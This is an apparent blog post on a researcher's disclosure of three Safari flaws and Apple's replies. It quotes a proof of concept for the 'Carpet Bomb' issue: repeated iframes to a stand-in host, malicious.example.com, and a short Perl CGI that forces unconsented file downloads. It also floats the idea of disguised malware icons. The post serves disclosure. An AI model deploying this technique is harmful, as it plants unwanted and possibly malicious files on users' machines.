Nitesh Dhanjani released information about some of his newest research on the Safari web browser this morning, and interestingly enough, Apple has decided NOT to fix some of the issues he presented.
Dhanjani reported three issues, as follows below from his blog:
1. Safari Carpet Bomb.It is possible for a rogue website to litter the user's Desktop (Windows) or Downloads directory (~/Downloads/ in OSX). This can happen because the Safari browser cannot be configured to obtain the user's permission before it downloads a resource. Safari downloads the resource without the user's consent and places it in a default location (unless changed).
Assume you visit a malicious site,
http://malicious.example.com/, that serves the following HTML:
<HTML> <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi" mce_src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi" mce_src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi" mce_src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> ... <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi" mce_src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> </HTML>
Now assume that
http://malicious.example.com/cgi-bin/carpet_bomb.cgiis the following:
#!/usr/bin/perl print "Content-type: blah/blah\n\n"Since Safari does not know how to render
blah/blah, it will automatically start downloading
carpet_bomb.cgievery time it is served. If you are using Safari in Windows, this is what will happen to your desktop once you visit http://malicious.example.com/:
The implication of this is obvious: Malware downloaded to the user's desktop without the user's consent.
Apple does not feel this is a issue they want to tackle at this time.
In my most recent email to Apple, I suggested that they incorporate an option in Safari so the browser can be configured to ask the user before anything is downloaded to the local file system. Apple agreed it was a good suggestion:
...the ability to have a preference to "Ask me before downloading anything" is a good suggestion. We can file that as an enhancement request for the Safari team. Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads. This will require a review with the Human Interface team. We want to set your expectations that this could take quite a while, if it ever gets incorporated.
[credit to BK have-it-your-way Rios for suggesting the term "Carpet Bomb" to describe this issue].
Let's hope Apple does add the suggestion Nitesh mentioned at least. I see this as a major security issue. Unless I'm off the mark, someone could create a piece of Malware, call it "My Computer", give it an icon that looked just like the "My Computer" icon, and litter it all over someone's desktop. My guess is that more than a few people would double click that, making this a serious issue.
Click read more below to read the rest...
2. Sandbox not Applied to Local Resources. This issue is more of a feature set request than a vulnerability. For example, Internet Explorer warns users when a local resource such as an HTML file attempts to invoke client side scripting. I feel this is an important security feature because of user expectations: even the most sophisticated users differentiate between the risk of clicking on an executable they have downloaded (risk perceived to be higher) to clicking on a HTML file they have downloaded (risk perceived to be lower).
Apple's response was positive: ...we have been investigating the potential for a "safe" mode for local HTML. This is an area that requires a fairly deep investigation to address compatibility issues, and to determine the proper operation. Please understand that when we label this as a security hardening measure, we are not discounting the benefits that this could have.
Ok, with this one I'm happy with Apple's response and agree with their plan of action.
3. [Undisclosed]. The third issue I reported to Apple is a high risk vulnerability in Safari that can be used to remotely steal local files from the user's file system. Apple responded positively and let me know that they are actively working to resolve the issue and issue a patch. I will post an update if I hear back from them.
I'd like to thank the Apple security team for their timely responses and for letting me discuss these issues with the security community.
Apple's stance on some of these issues is concerning. For now, I'm forgoing my research on the Mac OS X because I'm afraid Nitesh is going to pwn my box.